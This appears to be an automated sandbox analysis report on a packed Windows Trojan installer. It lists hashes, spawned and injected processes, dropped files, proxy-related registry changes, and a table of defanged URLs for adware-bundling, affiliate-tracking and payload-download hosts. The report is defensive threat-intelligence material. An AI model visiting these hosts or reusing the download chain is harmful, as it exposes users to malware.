MD5: a53a46b1afcce795c1c1e05f42be0017
SHA1: 5999d2539fcb9e48ec172efa5f5a56e638c13cc3
SHA256: 7603c38513ca8d6f366b360bbcc4c0b23f3a1aeb02d78772ef1454d01b61b1e6
SSDeep: 12288:BK2mhAMJ/cPlJJwUpCsN2ISr SmTas wRzXDIgySg5nS9i9ukkciNUya:w2O/GlJJo4SJOkgySgQ9i9FTya
Size: 607210 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-06-09 16:19:49
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

sevensetup.exe:3948
cpSetup.exe:3688
%original file name%.exe:3832
run-setup.exe:3724

The Application injects its code into the following process(es):

Setup__21223_il2.exe:2108

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process sevensetup.exe:3948 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nseDC0D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nseDC0D.tmp\593687e92906d_ua.exe (246894 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QTNNLZJL.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1QFHGNZ6.txt (112 bytes)

The Application deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nseDC0D.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsuDB80.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nseDC0D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nseDC0D.tmp\593687e92906d_ua.exe (0 bytes)

The process cpSetup.exe:3688 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\appImg[1].jpg (4 bytes)

The process %original file name%.exe:3832 makes changes in the file system.
The Application creates and/or writes to the following file(s):

The Application deletes the following file(s):

The process run-setup.exe:3724 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (597 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__21223_il2.exe (51957 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz9280.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (76443 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (4679 bytes)

The Application deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz9280.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz927F.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (0 bytes)

The process Setup__21223_il2.exe:2108 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\finish[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\accept[1].gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\next[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\cancel1[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\cancel[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\skip[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\logo[1].png (3756 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\amipb[1].js (37377 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\footer_img[1].png (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\dm_left_image[1].png (5637 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\decline[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\index[1].htm (8267 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\main[1].css (1081 bytes)

Registry activity

The process sevensetup.exe:3948 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3B 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "E0 04 B1 71 2B DF D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nseDC0D.tmp\593687e92906d_ua.exe,"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process cpSetup.exe:3688 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "A0 0C 6C 71 2B DF D2 01"
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1496739673"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "A0 0C 6C 71 2B DF D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process %original file name%.exe:3832 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Setup__21223_il2.exe:2108 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1478709492"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "E0 04 B1 71 2B DF D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__21223_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__21223_il2_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__21223_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__21223_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__21223_il2_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__21223_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__21223_il2_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__21223_il2_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 617
01d8f21bdcf3f33cfd44b21cda45bbe1
e1b3172a2a2811d1e9bc7b4bc4fa872d
7517fa12ceb92150dbb1767bd755292e
34776d0e4872f6381fe30f08b535c616
b002519e4629cce02aaaaa8f4b1fc78c
d9fba7c4cf61e2e2661d638f9b0ba621
fecabfe140d1a90ec17851556ca433e3
bfb12af5d963295bab80d33cfeb5f510
c0ec079861d336ada8d86ddcb41eca08
9bbeed8ce3163d16326f426d55c7e4a1
8a7825ea7577c061688d98df85922190
dc62c1890ab1a128287821f934290225
cb5f2c30905754dd0a7b91f8a119c9d2
b341d6146fe51e050ac620f0210fc35b
ad78547bc1ba82b204249f6e6020a265
f030a985a57d7c23321efc5a8e19fc93
765db28d942b461589f3c8318238347d
4189aec8b64cd9e7bd91e1f034c86cc9
a32b4dc8c494107529559af57bb01ef4
1cebb2d0afb37a6e8c81ec7a3a10ee55
d0c5d59edeae0af5843ce1252f2d2474
4e57bb290a687326c67f7ecbc75d39a1
39f95eeb8faa61eea104843102ab3368
e59b3308d9131b71a2c960ec1adc0950
0cb5d13a138e0d5aa363ef5589e6cca6

URLs

URL	IP
hxxp://pe-mainin.com/start.php?p=sevenzip&pid=201&tid=320779&sid=101	46.21.100.248
hxxp://d2yevmf1zg53hf.cloudfront.net/?affId=1006&appTitle=Installation&s1=201&s2=320779&setupName=cpSetup&appVersion=2.92&instId=11&exe=1
hxxp://di5k50sh3hqjp.cloudfront.net/get.php?ses=gEsz9JGrJC2fqloQnyLiA
hxxp://when.legtest.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=201&aff_sub2=320779&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1078188741&url=http://when.legtest.bid/offer.php?affId={aff_id}&trackingId=237110129&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	52.222.149.173
hxxp://disk.thingunit.bid/aff_c?offer_id=4&aff_id=2601&source=2519&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1280881289&url=http://when.legtest.bid/offer.php?affId={aff_id}&trackingId=237110129&instId=2519&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	52.48.172.184
hxxp://when.legtest.bid/offer.php?affId=2601&trackingId=237110129&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	52.222.149.173
hxxp://when.legtest.bid/installer.php?affId=2601&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&trackingId=237110129&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	52.222.149.173
hxxp://wake.tendencyrhythm.bid/installer.php?affId=2601&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&trackingId=237110129&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	54.88.21.193
hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg	52.222.149.131
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg	52.222.149.131
hxxp://wake.tendencyrhythm.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=102fec9aa12d4b58230e6934ddb0c4&transId=237110129&chk_s_b=VMware-56 4d a0 30 e2 be 5d 5f-54 fe 95 b6 80 af 71 a7&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:0C:29:AF:71:A7&randid=0.03931133326107622	54.88.21.193
hxxp://wake.tendencyrhythm.bid/report.php?typ=conversion&transId=237110129&affId=1006&instId=11&ho_transId=102fec9aa12d4b58230e6934ddb0c4&s1=201&s2=320779&s3=&s4=LP_DEF&s5=1078188741&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.15297462371944487	54.88.21.193
hxxp://di5k50sh3hqjp.cloudfront.net/stub_maker_uk2.php?url=hxxp://tragony.info/taveara?q=Installation
hxxp://1jptv.voluumtrk.com/08e0b779-c1db-404a-b9a2-b4657d709f22
hxxp://tragony.info/taveara?q=Installation	104.27.183.12
hxxp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html	52.222.149.217
hxxp://ic-dc.bundlessafevault.com/pr/public/css/style.css	52.222.149.217
hxxp://ic-dc.bundlessafevault.com/pr/public/js/functions.js	52.222.149.217
hxxp://disor.info/?ad=2&ver=1&sid=8251&url=http://tracking.revimedia.com/aff_c?offer_id=1199&aff_id=6929&aff_sub=PUBLISHER-ID&aff_sub2=CLICK-ID&aff_sub3=Default3&name=Installation&type=setup&size=3145728&sub_id=346&sub_id2=xix83rL7UAklplfRhE59ceMXcJzpQ_SoLSU9X8J-WPJsn6YCzorJXUDMnpx6I3pRBYWOzidVOdqgwnFypUy8ZhHAzv5shO6ULJCk-043egquzckYfg	104.27.171.13
hxxp://n135adserv.com/js/show_ads_supp.js?pubId=5103
hxxp://goodreason.top/wEaZwFrowCToRAEIhSTxlTRwSKkwiQ8kxCG1hDxYSAsMVA7gAG3whFPgxC_UzEQ0xI0MSLxghS9UUCI0hJwUiNjQABC0SIX9RArgjPCpzWvAkM_8SF8wTOJ4QOSAiPOcRSbxiH54hAI0gGzQzXl0xQb9AEf4UWY11BBYiFGIgWflkQE11SMlEHHcyAEEwQEt0VCRlQNZ1XBBUTGIBEHEVXaNgHAURHLxUSd4RAVMlXDZgBGQgAbUhBYABFmEkUbFhHQYRUHZ1QaUwAK4xC8wlQQQxG2kgFCEVPuEEK5YyLrQkRRQwCs0gERgUL_YkKrAjM44zI9kjUSYBBmEgCCwlVRF1TJdBGnURDVY1VQdkWFpQE-MwFH4gBQNBPR8hBD9zFAAgRY0xFUUhGdEhAA5AGCMRDZMRBd1zR1UFAXMQEFZVQW0hFKVlVCRkSLlkTSpAAFkEVMl0QLB1EN8RTLozY3l3ZsNmevNGa5R3cxh3crRHculmdrhnb4FWcyFGap9Gc	46.101.197.6
hxxp://aleph.comparent.ru/8gVdhESIJ1QEglEMggWYwgCehFCH90GNQBTctBQfcVQCkVVTh0BeYAG5sQHNwgJAsRFBcRHmMAGTIQVFh1UbpwGfohMaEBGD0BEz8BELswUN5VTLRgBQwRGDghMTYBEK0xFC0hJSoAGNITTFsAHN0hAQwUQFJ0WFwRHAciHX0QFO4QGMUjHcEANVcgMORBGbYgBF4wWVZkFHQDHKABHIggDVpVXZNhOk4TIadTEKE1BbwyPBATUAozGfgyAD8BCK0jIIExA2MDKj8zBaNyXB8RBroCOsIzCBgwN140FK4SI2AUPRJDUswzJJ0jMlgwAkEBLh0hGAFFNJ8TEFoRBS4iPRJyHHBUAHogVWp1Sd0gLDgBBLZ0SPtFWER1TQEhJMcwBOR1WBZlRUllRah0UbpQEP0xTYpVCbYQEfo1QbFQAYkRVFh0BWYwHHIQAVwgCAsjVWpFHUUwHDFUVa5RBM4QDDoCUHpBDd0iEKkxX90CXq4iPlkCVL1gHVEzCSkxXqsTW-0TMq0SPjgzJUhAHKATDA8wSNpEQY9EEFcyHfUwVYRlRYdVDQATGDgwCbckGxQhENcVJUsgEPxgHN8ABQkhDUAkCaEhENMhBYcVJWhzSRkxABg0UbNQGTwUQWlETcpkVWpVHQcxUN9kRLB1SLoQHEVhOtRHe55mc0xGe5lHZxFWb3lmapl3brZmb
hxxp://n135adserv.com/ads-async.js?v=1&key=3a71f57f6d976f956c5f61dbdd4adf7b&tarId=3a71f57f6d976f956c5f61dbdd4adf7b_sync&cIds=&adsCampaignKey=1496798089125&ch=&click=&tz=3&t=1496798091303&requestUrl=http://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html&flashVer=23.0 r0&inDapIF=false&supp_width=320&supp_height=50&scrWidth=1916&scrHeight=902
hxxp://ic-dc.bundlessafevault.com/favicon.ico	52.222.149.217
hxxp://n135adserv.com/impression.gif?b=118203&p=5103&ch=&ad.trans.id=ammxbq72zzmp&ap=&wp=&cps=&c=10001&l=UA&h=8f136e40c877dac2422c2d2be7acf039&t=1496798091061&s=e0edce0204b209db8a0c76b02a2aefea&tz=3.0&sh=902&sw=1916&o=
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/xdownload.php?version=1.1.5.26&monitor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://ic-dc.bundlessafevault.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html	52.222.149.217
hxxp://ic-dc.bundlessafevault.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css	52.222.149.217
hxxp://n135adserv.com/js/show_ads_supp.js?pubId=907
hxxp://ic-dc.bundlessafevault.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png	52.222.149.217
hxxp://ic-dc.bundlessafevault.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png	52.222.149.217
hxxp://ic-dc.bundlessafevault.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png	52.222.149.217
hxxp://bas-elb.go2jump.org/aff_c?offer_id=1199&aff_id=6929&aff_sub=PUBLISHER-ID&aff_sub2=CLICK-ID&aff_sub3=Default3
hxxp://5xfor.x.incapdns.net/?a_aid=65f4g4dfgsdfb1dfgh&page=m-2-panther&clickid=10200827de76ab08c4097a34ad51ad&pubid=6929&aff_sub=PUBLISHER-ID
hxxp://google.com/	216.58.214.238
hxxp://www.google.com.ua/?gfe_rd=cr&ei=mVM3Wdr1CMXR8gf1_ppA	64.233.164.94
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://e6845.dscb1.akamaiedge.net/crls/secureca.crl
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACEAEAISWIsPpZp3fvBXtmJ98=
hxxp://google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCB2EeaQNimqU	216.58.214.238
hxxp://dyno3mlj15jgv.cloudfront.net/V39/amipb.js
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/finalize.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/Html/867fdcc0-763f-4284-b64c-78c38739d5da/logo.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png
hxxp://google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCB4rVb3FyuQ1	216.58.214.238
hxxp://www.secularistsarakolet.site/finalize.php	54.243.162.153
hxxp://www.secularistsarakolet.site/Html/867fdcc0-763f-4284-b64c-78c38739d5da/logo.png	54.243.162.153
hxxp://ic-dc.deliverydlcenter.com/favicon.ico	52.222.149.17
